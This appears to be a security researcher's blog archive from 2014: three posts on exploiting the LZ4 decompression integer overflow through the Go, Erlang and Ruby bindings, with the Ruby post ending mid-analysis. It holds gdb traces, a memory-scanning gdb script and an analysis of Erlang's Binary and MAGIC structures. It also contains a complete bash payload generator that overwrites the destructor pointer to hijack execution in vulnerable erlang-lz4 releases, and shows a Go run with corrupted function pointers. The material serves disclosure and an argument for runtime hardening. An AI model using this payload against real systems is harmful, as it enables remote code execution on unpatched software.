Friday, July 11, 2014

Bla Bla LZ4, Bla Bla GoLang Or Whatever

I Was Coerced 

A lot of people don't know this, but I've known Jaime Cochran for almost fifteen years. We've been friends as long as I've been on the Internet. So, when she jabbed me earlier tonight saying "Hey, why the hell haven't you looked at GoLang yet?", my first reaction was obviously "Kiss off". My second reaction was "fine, I guess I should at least search around". 

As it turns out, CloudFlare (who I actually like quite a bit) has a vulnerable GoLang package on GitHub that has been fairly popular. Last night I poked around a bit and got silly with the Go Stuffs. The result was the following source file:

package main

import (
        "io/ioutil"
        "golz4"
        "fmt"
)

func main() {
        // Read the crafted LZ4 payload from disk.
        input, err := ioutil.ReadFile("/home/x/lz4/go.lz4")
        if err != nil {
                fmt.Printf("failed: %#v\n", err)
                return
        }

        // 17 MiB destination buffer handed to the cgo LZ4 bindings.
        output := make([]byte, (17 * 1024 * 1024))
        err = lz4.Uncompress(input, output)
        if err != nil {
                fmt.Printf("failed: %#v\n", err)
        }
}

Using this little beauty with CloudFlare's package resulted in the following Fun Times (TM). Note that I'm not even changing the contents of the mklz4.sh payload, I'm only adjusting the offset a bit. More details on this later. 

donb@debian:~$ ./donblz4
fatal error: unexpected signal during runtime execution
[signal 0xb code=0x2 addr=0x2 pc=0x804bf11]

runtime stack:
runtime: unexpected return pc for runtime.sigpanic called from 0x804bf11
runtime.throw(0x8160045)
        /home/x/lib/src/go/go/src/pkg/runtime/panic.c:520 +0x71
runtime: unexpected return pc for runtime.sigpanic called from 0x804bf11
runtime.sigpanic()
        /home/x/lib/src/go/go/src/pkg/runtime/os_linux.c:222 +0x46
... and so on ...

Well, because I have had just about enough of this LZ4 hacking crap, I was ready to call it a night. But, Ben Nagy (who I once got drunk with in Singapore, surprise, surprise) asked me to investigate a bit further. Why? He's interested in using this as an example to push for GoLang run-time hardening. I'm Pro-Ben (I honestly haven't given much thought to run-time hardening in Go ;-)) so I figured I'd help out. 

I really have no idea whether people will care or listen to these details, or whether they'll even help with run-time hardening. But, what the heck, right? Let's try and Do Some Good, anyway. 


Quick and Dirty

So the point of this is not necessarily to gain RCE, but to prove that RCE is possible. This is because libraries like CloudFlare's LZ4 package, like the other tests I've been performing against LZ4, are out of application context. Because of GoLang's memory layout, I cannot (in this short amount of time) develop a guaranteed one-shot RCE like I can for Erlang and Python. 

But, attacking GoLang is much more profitable than Ruby. With Ruby, you never know where your memory chunk will end up in RAM and you never know whether there is a valid page prior to that chunk. In GoLang, things are much, much simpler. 

(gdb) where
#0  LZ4_decompress_fast (source=0x18336000 "\017", dest=0x19348000 "", outputSize=17825792)
    at /home/donb/go/src/golz4/src/lz4.c:823
#1  0x0804c212 in LZ4_uncompress (outputSize=, dest=,
    source=) at /home/donb/go/src/golz4/src/lz4.h:193
#2  _cgo_e56f7980f8b8_Cfunc_LZ4_uncompress (v=0xb7d3eea4) at /home/donb/go/src/golz4/lz4.go:50
#3  0x08072125 in runtime.asmcgocall () at /home/donb/lib/src/go/go/src/pkg/runtime/asm_386.s:624
#4  0xb7d3eea4 in ?? ()

After loading up 'donblz4' and breaking at LZ4_decompress_fast, the function called by the GoLang bindings, we see the above call trace. All we really need to look at is the variable dest, which identifies the address at which the decompression payload will be stored. This is the address from which memory corruption will occur. So, the most likely memory segment to corrupt will be the one this address resides in. 

Unlike Ruby, which uses Linux's standard glibc heap for new memory buffers/Objects, GoLang uses a completely separate memory segment. It creates a memory map that is Read and Write only. We can easily spot this by checking the process's memory mapping. 

 
(gdb) info inferiors
  Num  Description       Executable
* 1    process 8291      /home/donb/donblz4
(gdb) ^Z
[2]+  Stopped                 gdb -q donblz4
donb@debian:~$ cat /proc/8291/maps
08048000-0815f000 r-xp 00000000 fd:00 122015     /home/donb/donblz4
0815f000-0816f000 rw-p 00116000 fd:00 122015     /home/donb/donblz4
0816f000-081a4000 rw-p 00000000 00:00 0          [heap]
08200000-08205000 rw-p 00000000 00:00 0
08205000-17ec0000 ---p 00000000 00:00 0
17ec0000-1a500000 rw-p 00000000 00:00 0
1a500000-38302000 ---p 00000000 00:00 0

Obviously, the address at which dest points does not fall within the standard heap. As suggested above, there is an entirely separate memory chunk. What's great about this chunk is it isn't just allocated for our large LZ4 decompression payload. And, even if it were, it isn't the only type of data that lives there. 
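
The lookup described above can be reproduced offline. The following is a minimal Python sketch, not part of the original tooling: it takes the maps lines exactly as printed above and reports which mapping holds the dest address from the backtrace. The helper name find_mapping is made up for this illustration.

```python
# The /proc/<pid>/maps lines shown above, copied verbatim.
MAPS = """\
08048000-0815f000 r-xp 00000000 fd:00 122015     /home/donb/donblz4
0815f000-0816f000 rw-p 00116000 fd:00 122015     /home/donb/donblz4
0816f000-081a4000 rw-p 00000000 00:00 0          [heap]
08200000-08205000 rw-p 00000000 00:00 0
08205000-17ec0000 ---p 00000000 00:00 0
17ec0000-1a500000 rw-p 00000000 00:00 0
1a500000-38302000 ---p 00000000 00:00 0
"""


def find_mapping(maps_text, addr):
    """Return (start, end, perms, name) for the mapping holding addr, or None."""
    for line in maps_text.splitlines():
        fields = line.split()
        start, end = (int(x, 16) for x in fields[0].split("-"))
        if start <= addr < end:
            name = fields[5] if len(fields) > 5 else ""
            return start, end, fields[1], name
    return None


DEST = 0x19348000  # dest argument from the gdb backtrace
start, end, perms, name = find_mapping(MAPS, DEST)
print("%08x-%08x %s %s" % (start, end, perms, name or "(anonymous)"))
```

The same helper shows that the source pointer from the backtrace (0x18336000) lands in that anonymous rw-p mapping too, rather than in the region labelled [heap].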

Scanning around that chunk of memory we can easily determine whether function addresses reside here, and whether they will sit at predictable offsets in RAM. 

I generated a simple gdb script to identify addresses within memory that fit with the 'donblz4' executable regions:

define scanlz4

        set $x = ($arg0)
        set $y = ($arg1)
        set $x_start = ($arg2)
        set $x_end = ($arg3)

        while $x < $y
                if *(unsigned int * )$x >= $x_start && *(unsigned int * )$x < $x_end
                        printf "%.08x: found value %.08x \n", $x, *(unsigned int *)$x
                end
                set $x += 4
        end

end

Running the above script, even against our tiny do-nothing test executable, revealed over 50 results within the same chunk of memory as our dest buffer. 

(gdb) scanlz4 0x183000e0 0x1a500000 0x08048000 0x0815f000
183000ec: found value 0807353a 
18300124: found value 080fa3b8 
18300144: found value 080fa3d8 
18300164: found value 080fa398 
18300184: found value 080fe278 
183020b8: found value 08072109 
183020d4: found value 08050a7a 
18302130: found value 08070be2 
18302298: found value 08051474 
183022b4: found value 08051474 
18302310: found value 0805cc20 
18302338: found value 0805f204 
183023b0: found value 08055ee0 
183023d8: found value 0805f204 
18302450: found value 08055ee0 
183026f8: found value 0805f4b0 
18302714: found value 0805f4b0 
18304004: found value 080f2880 
18304064: found value 080ecc81 
^CQuit
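
For readers without gdb at hand, here is the same scan as a rough Python sketch over a raw memory dump. The function name scan_words and the 16-byte sample dump are invented for illustration; only the single matching word mirrors the first hit in the output above.

```python
import struct


def scan_words(buf, base, lo, hi):
    """Yield (address, value) for each aligned little-endian 32-bit word in
    buf whose value falls in [lo, hi). base is the address of buf[0]."""
    for off in range(0, len(buf) - 3, 4):
        (value,) = struct.unpack_from("<I", buf, off)
        if lo <= value < hi:
            yield base + off, value


# Hypothetical 16-byte dump starting at 0x183000e0; only the word at
# 0x183000ec (0x0807353a) mirrors the first hit in the gdb output.
dump = struct.pack("<4I", 0, 0x11223344, 0xFFFFFFFF, 0x0807353A)
for addr, value in scan_words(dump, 0x183000E0, 0x08048000, 0x0815F000):
    print("%08x: found value %08x" % (addr, value))
```

Like the gdb version, this only proves that a word looks like an address inside the executable's text mapping. Whether it is really a code pointer still has to be checked by hand.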

We can easily see that these values point at actual code in the executable by inspecting the instructions at each address. 

(gdb) x/8i 0x0807353a
   0x807353a :   pop    %ecx
   0x807353b :   pop    %ecx
   0x807353c :   test   %eax,%eax
   0x807353e :   jne    0x80735de
   0x8073544 :   mov    0x2c(%esp),%ebx
   0x8073548 :   mov    %ebx,(%esp)
   0x807354b :   mov    0x6c(%esp),%ebx
   0x807354f :   mov    %ebx,0x4(%esp)

So now that we know where a bunch of function addresses are, we can really just adjust the LZ4 payload I've been using in all of my blog posts to spam 0x11223344 at a chunk of memory that has a high concentration of known function pointers. 

Doing so demonstrates that these function pointers can be corrupted in a reliable fashion. What I end up controlling, however, are threads other than the one that LZ4 is executing within. In fact, the entire LZ4 payload hasn't even finished writing by the time the memory corruption triggers a SIGSEGV in another thread. 

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb743bb70 (LWP 8295)]
0x11223344 in ?? ()
(gdb) info threads
  Id   Target Id         Frame
  4    Thread 0xb6c3ab70 (LWP 8296) "donblz4" 0x0804c00d in LZ4_decompress_generic (targetOutputSize=0,
    partialDecoding=0, prefix64k=1, endOnInput=0, outputSize=17825792, inputSize=0, dest=0x19348000 "",
    source=0x18336000 "\017") at /home/donb/go/src/golz4/src/lz4.c:759
* 3    Thread 0xb743bb70 (LWP 8295) "donblz4" 0x11223344 in ?? ()
  2    Thread 0xb7d3cb70 (LWP 8294) "donblz4" _fallback_vdso ()
    at /home/donb/lib/src/go/go/src/pkg/runtime/rt0_linux_386.s:21
  1    Thread 0xb7e4d6d0 (LWP 8291) "donblz4" _fallback_vdso ()
    at /home/donb/lib/src/go/go/src/pkg/runtime/rt0_linux_386.s:21
(gdb)

So, there we have it. Because the dest buffer resides in the same memory chunk as function pointers, and there are no guard pages to hinder memory corruption, I have the ability to overwrite objects in memory that affect other threads. 

All in all, this is pretty Good Times. I'm glad Jaime and Ben pushed me to bother with this because otherwise I would have just closed out with Erlang. Three RCE-capable languages with LZ4 is pretty sick, though, and was deserving of my time. 

Summary

So now we know that RCE can be achieved in GoLang. However, there are caveats:
  • Unlike Erlang and Python, memory layout isn't guaranteed
  • The entire "compressed" LZ4 payload may precede anything important (must jump over)
  • This means that (for now) there is no universal one-shot exploit for GoLang via LZ4
  • A Function-Spray doesn't necessarily cause a SIGSEGV before the pointer is executed
  • This is sufficient evidence for improvement (hardening) of the GoLang runtime
  • CloudFlare, please update your LZ4 repo
Best,
Don A. Bailey
Founder / CEO
Lab Mouse Security
@InfoSecMouse
https://www.securitymouse.com/

Thursday, July 10, 2014

A Final LZ4 Act - Hacking Erlang

Killing Money

I've been getting a lot of emails, DMs, PMs, etc, congratulating me on my perseverance through the P.R. mess that has been the LZO/LZ4 bugs. Thanks for your support! But, let's be realistic, I've really just been killing money. 

The amount of engineering effort that it takes to "prove" something vulnerable with an exploit is an often unnecessary add-on to a bug report. We're talking about potentially thousands of dollars in consulting hours lost due to efforts that shouldn't be required in the first place. When a bug is reported and has been fixed, that's all that should be required to say "hey, we should patch this". 

I think the information security industry is failing itself, its clients, and the general Internet community when we waste time asking people to "prove it with code". If the bug report is sufficiently elaborate, then perhaps time is better spent patching and moving on with it. 

I chose to "prove it with code" because first of all I don't like to lose. I'm not going to lie, a lot of it was about the selfish need to prove myself right. But, I also did it because it's my job. I released these bugs in the first place because it was the right thing to do, and as an information security consultant, my job is to try and make the Internet safer. 

So, by spending thousands of dollars in lost consulting time, I'm hoping to have saved a few companies out there hundreds of thousands of dollars in remediation, forensics, and engineering time, chasing down adversaries and critical bugs that could end up costing a lot more than just money.

With that said, I've had enough of this LZ4 bug. It was fun, but I've made my point. 

Writing Twice In A Write-Once Language

Attacking Erlang as a language is fun times. Why? Because the Erlang virtual machine only allows objects to be written to once. Each variable in the Erlang language can only be written at instantiation. If you want to write to that variable again, too darn bad. The VM forbids it. Just check out the simple example below. For those that aren't familiar with Erlang, run "apt-get install erlang" on a 32-bit machine (my test environment, as always, is x86 32-bit Debian 7.5.0). 

Erlang/OTP 17 [erts-6.1] [source] [async-threads:10] [hipe] [kernel-poll:false]

Eshell V6.1  (abort with ^G)
1> Variable = "Hello".         
"Hello"
2> Variable.
"Hello"
3> Variable = "Lol".
** exception error: no match of right hand side value "Lol"
4> 

In the above example we can see that the Erlang shell "erl" allows us to set variables, similar to Python's interactive prompt. The only difference here is that you can only do so once. Further writes to the variable require deletion of said variable. This is because in Erlang's pattern matching system, the right side of an expression must always match the left side, unless the left side has not yet been defined. 

This is amazing for pattern matching functionality, and is part of the elegance of a functional language such as Erlang, Haskell, etc. 

I, personally, am a big fan of Erlang, and write a lot of code in it. I recently wrote a fuzzer for DNP3 for no other reason than to see if I could. I did. It was fun. 

What isn't fun is attacking Erlang because of the nature of the language depicted above. It's not easy to mangle objects in memory when you can't alter them after the fact. 

Oh, LZ4, You Slay Me^H^HErlang

But, that's where the beauty of an elegant bug like the LZ4 memory corruption flaw comes in. In order to use LZ4's optimized library, it's best to call into it from the Erlang language. To do this, a Native Implemented Function must be constructed. This is basically the Erlang equivalent to Ruby or Python bindings that connect Erlang's language to an existing shared library. 

What this means is, by calling the LZ4 Erlang module from within Erlang, we are actually talking to the LZ4 C library through a binding interface. This gives us an opportunity to attack the decompression function in the same way we would for any other system. 

What's even better about this simple functionality is that because the variable we define with the decompressed data is set after the data has been decompressed, we are essentially corrupting an Object in memory as it is being instantiated.

Note: The maintainer of the erlang-lz4 NIF is smart and quick. They updated the erlang-lz4 package before I had a chance to get to it, so kudos to szktty. If you want to play with a vulnerable release of their code, please clone the repository on GitHub and then check out version 0.1.1.

To start off, let's take a look at how the NIF bindings work. You can follow along in the erlang-lz4 repository.

static ERL_NIF_TERM
nif_uncompress(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{
  ERL_NIF_TERM ret_term;
  ErlNifBinary src_bin, res_bin;
  long res_size;

  if (!enif_inspect_binary(env, argv[0], &src_bin) ||
      !enif_get_long(env, argv[1], &res_size))
    return 0;

  enif_alloc_binary((size_t)res_size, &res_bin);

  if (LZ4_uncompress((char *)src_bin.data, (char *)res_bin.data,
        res_bin.size) >= 0) {
    ret_term = enif_make_tuple2(env, atom_ok,
        enif_make_binary(env, &res_bin));
    enif_release_binary(&res_bin);
    return ret_term;
  } else {
    enif_release_binary(&res_bin);
    return enif_make_tuple2(env, atom_error, atom_uncompress_failed);
  }
}

In the above code, we can see how the Native Implemented Function handles a call to lz4:uncompress(). The first argument is the data to be decompressed, and the second argument is the size of the buffer that the data will be decompressed into. 

This decompression buffer is essentially the variable, even though no variable has yet been assigned to. Why is this? Remember that variables are set once in Erlang, so once an object has been created in memory, it's done. That's it. No more mangling. If that object must be altered in any way, a new instantiation is used - not the object that was originally created. Therefore, we have to focus on corrupting the object as it is initially decompressed. 

In the above example, we can see that res_bin is the ErlNifBinary object created to hold the destination buffer data. The size of the destination buffer, as I mentioned a moment ago, is passed in as the second argument to lz4:uncompress(). Let's ignore for a moment that the author of the erlang-lz4 NIF ignores the allocator's return value and focus on the contents of enif_alloc_binary.

int enif_alloc_binary(size_t size, ErlNifBinary* bin)
{
    Binary* refbin;

    refbin = erts_bin_drv_alloc_fnf(size); /* BUGBUG: alloc type? */
    if (refbin == NULL) {
        return 0; /* The NIF must take action */
    }
    refbin->flags = BIN_FLAG_DRV; /* BUGBUG: Flag? */
    erts_refc_init(&refbin->refc, 1);
    refbin->orig_size = (SWord) size;

    bin->size = size;
    bin->data = (unsigned char*) refbin->orig_bytes;
    bin->bin_term = THE_NON_VALUE;
    bin->ref_bin = refbin;
    return 1;
}

As can be seen above (or on GitHub), enif_alloc_binary creates a Binary object in memory, which contains the actual allocated memory buffer orig_bytes. ErlNifBinary is simply a container for the Binary object, allowing for a semblance of inheritance in C, similar to PyObject variants in Python. 

So, all we really need to understand here is the layout of a Binary in memory, since that is where the decompression payload actually resides. 

typedef struct binary {
    ERTS_INTERNAL_BINARY_FIELDS
    SWord orig_size;
    char orig_bytes[1]; /* to be continued */
} Binary;

Here, we can see that the allocated object is defined almost exactly like objects in Python. For dynamic behavior, the structure's last value is an array of [1], implying that when this object is allocated in memory, any excess bytes allocated can be referenced at &orig_bytes[0], making Binary a dynamic object. This is the same methodology used in Python, and many other projects that require a semblance of classes, inheritance, or polymorphism in the C language. 

Since we know that our decompression buffer will point to &orig_bytes[0], we now know that we can use the LZ4 memory corruption bug to overwrite previous fields in the Binary object with little effort. So, let's take a look at those fields. 

#define ERTS_INTERNAL_BINARY_FIELDS   \
    UWord flags;                      \
    erts_refc_t refc;                 \
    ERTS_BINARY_STRUCT_ALIGNMENT

In the same file on GitHub, just above the Binary structure definition, we see the macro above. Counting the structure variable orig_size, there are four fields in memory before orig_bytes: the flags integer, a reference counter refc, a padding field on 32-bit systems, and orig_size itself. All four of these are 32 bits wide on a 32-bit architecture, meaning that if we point our memory corruption to 16 bytes prior to the start of the decompression buffer, we can overwrite them all. 
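
The 16-byte figure can be sanity-checked with a quick model of the structure. This is only a sketch under stated assumptions: the class name Binary32 and the field name align are made up here, and each header field is assumed to be exactly one 32-bit word, as described above for a 32-bit build.

```python
import ctypes


class Binary32(ctypes.LittleEndianStructure):
    """Model of the Binary header on a 32-bit target (assumed field widths)."""
    _fields_ = [
        ("flags", ctypes.c_uint32),         # UWord flags
        ("refc", ctypes.c_uint32),          # erts_refc_t refc
        ("align", ctypes.c_uint32),         # hypothetical name for the padding word
        ("orig_size", ctypes.c_int32),      # SWord orig_size
        ("orig_bytes", ctypes.c_char * 1),  # start of the decompression buffer
    ]


for name, _ in Binary32._fields_:
    print("%-10s offset %2d" % (name, getattr(Binary32, name).offset))
print("header bytes before orig_bytes:", Binary32.orig_bytes.offset)
```

Under those assumptions orig_bytes sits at offset 16, so a write that starts 16 bytes before the decompression buffer begins exactly at flags.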

Now, you might be saying to yourself "Don, but why would we bother? Is this a crappy exploit scenario like with Ruby? Are we just corrupting the header and going home?" That's a fair question, my friend. But, remember, Erlang isn't a crappy programming language like Ruby. You can do real things in Erlang besides building Metasploit modules. It's used for real world applications. So, of course you can get more functionality out of an exploit in Erlang! It's a functional language!

Polymorphism's A Bitch

Now the great thing about the Binary object is that it's destructed at some point, just like any self respecting garbage collected virtual machine would do. This means that something, at some point, has to inspect the Binary object. Let's see how that works by looking at the NIF again.

  if (LZ4_uncompress((char *)src_bin.data, (char *)res_bin.data,
        res_bin.size) >= 0) {
    ret_term = enif_make_tuple2(env, atom_ok,
        enif_make_binary(env, &res_bin));
    enif_release_binary(&res_bin);
    return ret_term;
  } else {
    enif_release_binary(&res_bin);
    return enif_make_tuple2(env, atom_error, atom_uncompress_failed);

Remember the code above? If LZ4 decompression returns with an error, a call is immediately made to enif_release_binary. This seems familiar! This is almost exactly how the Python bindings react to a failure in LZ4. Huh! Go figure! enif_release_binary is called whether LZ4_uncompress returns an error or not, but in the case of failure, it's called immediately. This looks more promising, so let's check it out. 

void enif_release_binary(ErlNifBinary* bin)
{
    if (bin->ref_bin != NULL) {
        Binary* refbin = bin->ref_bin;
        ASSERT(bin->bin_term == THE_NON_VALUE);
        if (erts_refc_dectest(&refbin->refc, 0) == 0) {
            erts_bin_free(refbin);

Back in the erl_nif.c file we can see that our corrupted Binary within the ErlNifBinary is immediately tested and passed to erts_bin_free. There are two very important things to note here:
  • The reference count in Binary is decremented, then tested for zero
  • erts_bin_free is simply passed the entire Binary structure
The first point is important because this immediately tells us that refc must be overwritten with 0x00000001 in order to make a call to erts_bin_free. The second point is the most important point: erts_bin_free doesn't know anything about our ErlNifBinary. This means that this is a generic memory destruct function, which also means that due to the polymorphic behavior of the virtual machine, it must presume that the dynamically allocated data should be interpreted somehow.... 

ERTS_GLB_INLINE void
erts_bin_free(Binary *bp)
{
    if (bp->flags & BIN_FLAG_MAGIC)
        ERTS_MAGIC_BIN_DESTRUCTOR(bp)(bp);
    if (bp->flags & BIN_FLAG_DRV)
        erts_free(ERTS_ALC_T_DRV_BINARY, (void *) bp);
    else
        erts_free(ERTS_ALC_T_BINARY, (void *) bp);
}

Bingo! We've got lift off. In the erl_binary.h file we can see that erts_bin_free does indeed attempt to interpret the type of binary it is passed. If the flags variable has BIN_FLAG_MAGIC (0x01) set, then a destructor function that resides in Binary is called. Awesome! But, our Binary isn't defined as a MAGIC object! So what! Just overwrite the flags variable with 0x00000001, and you're good to go. 
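
To make the two conditions concrete, here is a toy Python model of the release path quoted above. It is a sketch, not the VM's code: the function name release is invented, and the numeric value used for BIN_FLAG_DRV is an assumption made purely so the example runs.

```python
BIN_FLAG_MAGIC = 0x01  # value given in the text
BIN_FLAG_DRV = 0x08    # assumed value, for illustration only


def release(flags, refc):
    """Model enif_release_binary followed by erts_bin_free.
    Returns the list of actions the VM would take, in order."""
    actions = []
    refc -= 1                      # erts_refc_dectest: decrement, then test
    if refc != 0:
        return actions             # still referenced, nothing is freed
    if flags & BIN_FLAG_MAGIC:
        actions.append("call destructor")
    if flags & BIN_FLAG_DRV:
        actions.append("free as driver binary")
    else:
        actions.append("free as plain binary")
    return actions


print(release(BIN_FLAG_DRV, 1))    # untouched header from enif_alloc_binary
print(release(BIN_FLAG_MAGIC, 1))  # header after the overwrite
print(release(BIN_FLAG_MAGIC, 2))  # wrong refcount: destructor never runs
```

The third call is the reason the reference count matters: with any value other than 1 the decrement does not reach zero, and the destructor is never reached.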

MAGIC Happens

All that is left now is to evaluate what the structure looks like when it is interpreted as MAGIC. Oh, it is MAGIC indeed. Let's go back to global.h to inspect the proper structure. 

typedef struct {
    ERTS_INTERNAL_BINARY_FIELDS
    SWord orig_size;
    void (*destructor)(Binary *);
    char magic_bin_data[1];
} ErtsMagicBinary;

Oh, well isn't that perfect. The offset where we would normally have correctly decompressed data in a Binary structure (at the variable orig_bytes) contains a function pointer, destructor, in ErtsMagicBinary.

Well isn't that convenient! 

This means that our payload will essentially contain the BIN_FLAG_MAGIC value, followed by a reference count of 0x00000001, followed by 32bits of padding, followed by the original size value (any will do), followed by a function pointer. With this payload, we win. 
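
As a sketch of that layout, the five words can be packed with Python's struct module. The helper name magic_header and the default values for padding and orig_size are placeholders chosen for this example (the text says any size will do). The field order follows the paragraph above.

```python
import struct

BIN_FLAG_MAGIC = 0x00000001


def magic_header(destructor, orig_size=0x00100000, padding=0):
    """Pack the five 32-bit little-endian words described above:
    flags, refc, padding, orig_size, destructor."""
    return struct.pack("<5I", BIN_FLAG_MAGIC, 1, padding, orig_size, destructor)


blob = magic_header(0xDEADCA75)
print(len(blob), blob.hex())
```

The last four bytes come out as 75 ca ad de, which is the little-endian form of 0xdeadca75.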

Let's try it. Here is a simple Erlang program to call lz4:uncompress() with data from a payload file. 

-module(donb).
-export([
        doit/1]).

doit(File) -> 
        io:format("doit!~n"),
        case file:read_file(File) of
                {ok, B} ->
                        X = attack(B),
                        {ok, X};
                {error, R} ->
                        {error, file:format_error(R)}
        end.

attack(B) ->
        R = lz4:uncompress(B, 16#00100000),
        io:format("uncompress returned ~w~n", [R]).

Compile the file 'donb.erl' in Erlang using c(donb). Then, simply test it with the payload I described above. Adjustments to the Python payload from my previous blog post will do. The offset is the same. 

donb@debian$ /usr/local/bin/erl -noshell -run donb doit ~/lz4/erlang.lz4 -s init stop
doit!
Segmentation fault (core dumped)
donb@debian$ gdb -q /usr/local/lib/erlang/erts-6.1/bin/beam core
Reading symbols from /usr/local/lib/erlang/erts-6.1/bin/beam...done.
[New LWP 591]
[New LWP 595]
[New LWP 596]
[New LWP 597]
[New LWP 598]
[New LWP 599]
[New LWP 600]
[New LWP 601]
[New LWP 602]
[New LWP 603]
[New LWP 604]

warning: Can't read pathname for load map: Input/output error.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
Core was generated by `/usr/local/lib/erlang/erts-6.1/bin/beam -- -root /usr/local/lib/erlang -prognam'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadca75 in ?? ()
(gdb) 

And there you have it. The elegance of polymorphism in C once again allows us to turn Binary into MAGIC and end up with Remote Code Execution with only one single integer overflow. Attacking a language that doesn't even let you write to variables multiple times is a win with LZ4 corruption. 

Isn't that a beautiful thing? I think so. 

#!/bin/bash
#
# Erlang LZ4 exploit (should work for all OTP vers) - donb@securitymouse.com
# Works for versions of erlang-lz4 prior to 2x
# For testing only. Do not misuse.
#

FILE=./erlang.lz4

append()
{
        printf "$1" >> "$FILE"
}

init()
{
        rm -f $FILE
        touch $FILE
}

large()
{
        x="\"\\xff\" x $1"
        perl -e "print $x" >> $FILE
}

append_size()
{
        i=0
        while [ $i -lt $1 ]; do
                append $2
                i=$((i+1))
        done
}

# initialize the file
init

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes
large 16842995
append "\xdd"

# Binary structure overwrite
# we need 72 bytes but for more than 15 we need a mask
append "\xf0\x39"

# append the Binary header fields
append "\x01\x00\x00\x00"       # BIN_FLAG_MAGIC
append "\x01\x00\x00\x00"       # refcount
append "\x00\x00\x10\x00"       # orig_size
append "\xde\xad\xca\x74"       # padding(?)
append "\x75\xca\xad\xde"       # destructor
append "\xde\xad\xca\x79"       # magic bin data
append "\xde\xad\xca\x7a"       #
append "\xde\xad\xca\x75"       #
append "\xde\xad\xca\x76"       #
append "\xe0\x6f\x2c\x08"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #
append "\x00\x00\x00\x00"       #

# now finish with a bad reference
append "\xff\xff"
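
The numbers in the script's comments can be checked with a few lines of Python. This is my reading of the payload, not the author's own derivation: it assumes the standard LZ4 block encoding (a 4-bit length nibble of 15 is extended by following bytes until one is below 0xff, and match lengths get MINMATCH = 4 added) and 32-bit pointer arithmetic. The dest value is a made-up placeholder.

```python
MINMATCH = 4           # LZ4 adds 4 to every encoded match length
MASK32 = 0xFFFFFFFF    # pointers are 32 bits wide on this target


def extended_length(nibble, ff_count, last):
    """Length encoded by a 4-bit nibble of 15, ff_count bytes of 0xff,
    and one terminating byte below 0xff."""
    assert nibble == 15 and last < 0xFF
    return nibble + 255 * ff_count + last


# Token 0x0f -> match nibble 15; 13 + 16842995 bytes of 0xff; terminator 0xdd.
ff_count = 13 + 16842995
match_len = extended_length(15, ff_count, 0xDD) + MINMATCH
print(hex(match_len))                      # the "goal" from the script comment
print(match_len - (1 << 32))               # same bits read as a signed 32-bit value

dest = 0x10000000                          # hypothetical output pointer
print(hex((dest + match_len) & MASK32))    # where the output pointer ends up

# Token 0xf0 -> literal nibble 15; no 0xff bytes; terminator 0x39.
literal_len = extended_length(15, 0, 0x39)
print(literal_len, literal_len // 4)       # bytes, and 32-bit words, of literals
```

Under these assumptions the match length is 0xfffffff0, which moves a 32-bit output pointer back by 16 bytes, and the literal run that follows covers the eighteen 4-byte words appended after the "\xf0\x39" token.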

Wednesday, July 9, 2014

The LZ4-Ruby Two Hour Challenge

I'm a Ruby Virgin

So, I never found Ruby all that intriguing. It's just not that exciting to me. Sure, I can audit your Ruby on Rails app, but have I ever delved into the internals of Ruby to attack the language, itself? Nope. Not even remotely interested. 

Until today! 

I noticed that Ruby's lz4-ruby package is still vulnerable to the LZ4 memory corruption bug. Since this variant uses the LZ4_decompress_safe routine, I thought it was time to finally dive into the disgusting cesspool that is Ruby. 

I downloaded the latest RVM to my 32bit Debian 7.5.0 test-bed and went for a Polar Bear plunge. After installing the latest version of Ruby (2.1.2p95 2014-05-08 revision 45877) I went to work. 

Having a lot to do today, I only had two hours free to build and write up an attack for this platform. I'm still on the clock, so let's see how much info I can spill in the few minutes I have left. 

To follow along and install the ruby gem, simply run 

$ gem install lz4-ruby 

Once installed, you'll find that the gem can be referenced easily from the Ruby command line "irb". Since irb is horrible, we'll just throw together a quick little script. I'm using the payload from my Python attack as a starting point, so feel free to browse to the script embedded in that blog post in another tab. 

require 'lz4-ruby'

puts "ruby lz4 exploit - donb@securitymouse.com"

f = File.open("./ruby.lz4", "r")
d = f.read
f.close

$i = 0
while $i < 3 do
        puts "."
        sleep(1)
        $i += 1
end

LZ4::uncompress(d)

Above is the script I'm using to open and pass my payload to lz4-ruby's uncompress routine. This routine eventually calls our dear old friend LZ4_decompress_safe, which should be invulnerable to our attack! 

donb@debian:~/lz4$ ruby ./test.rb
ruby lz4 exploit - donb@securitymouse.com
.
.
.
/home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28:in `uncompress': Compressed data is maybe corrupted. (LZ4Internal::Error)
        from /home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:28:in `decompress'
        from /home/donb/.rvm/gems/ruby-2.1.2/gems/lz4-ruby-0.3.2/lib/lz4-ruby.rb:36:in `uncompress'
        from ./test.rb:16:in `<main>'

Aw, crap! So, I guess it's not vulnerable right off the bat. Analyzing the Ruby bindings shows that there is a funny little attribute of the Ruby platform that is screwing up our attack.

static VALUE lz4internal_uncompress(VALUE self, VALUE input, VALUE in_size, VALUE offset, VALUE out_size) {
  const char *src_p;
  int src_size;

  int header_size;

  VALUE result;
  char *buf;
  int buf_size;

  int read_bytes;

  Check_Type(input, T_STRING);
  src_p = RSTRING_PTR(input);
  src_size = NUM2INT(in_size);

  header_size = NUM2INT(offset);
  buf_size = NUM2INT(out_size);

  result = rb_str_new(NULL, buf_size);
  buf = RSTRING_PTR(result);

  read_bytes = LZ4_uncompress_unknownOutputSize(src_p + header_size, buf, src_size - header_size, buf_size);
  if (read_bytes < 0) {
    rb_raise(lz4_error, "Compressed data is maybe corrupted.");
  }

  return result;
}

The function above is the Ruby version of the LZ4 bindings, which you can view on GitHub. Notice the use of 'header_size'. Oddly enough, the Ruby LZ4 bindings have their own concept of a header, which is entirely different to the four byte little-endian header used by every other package (including Python). 

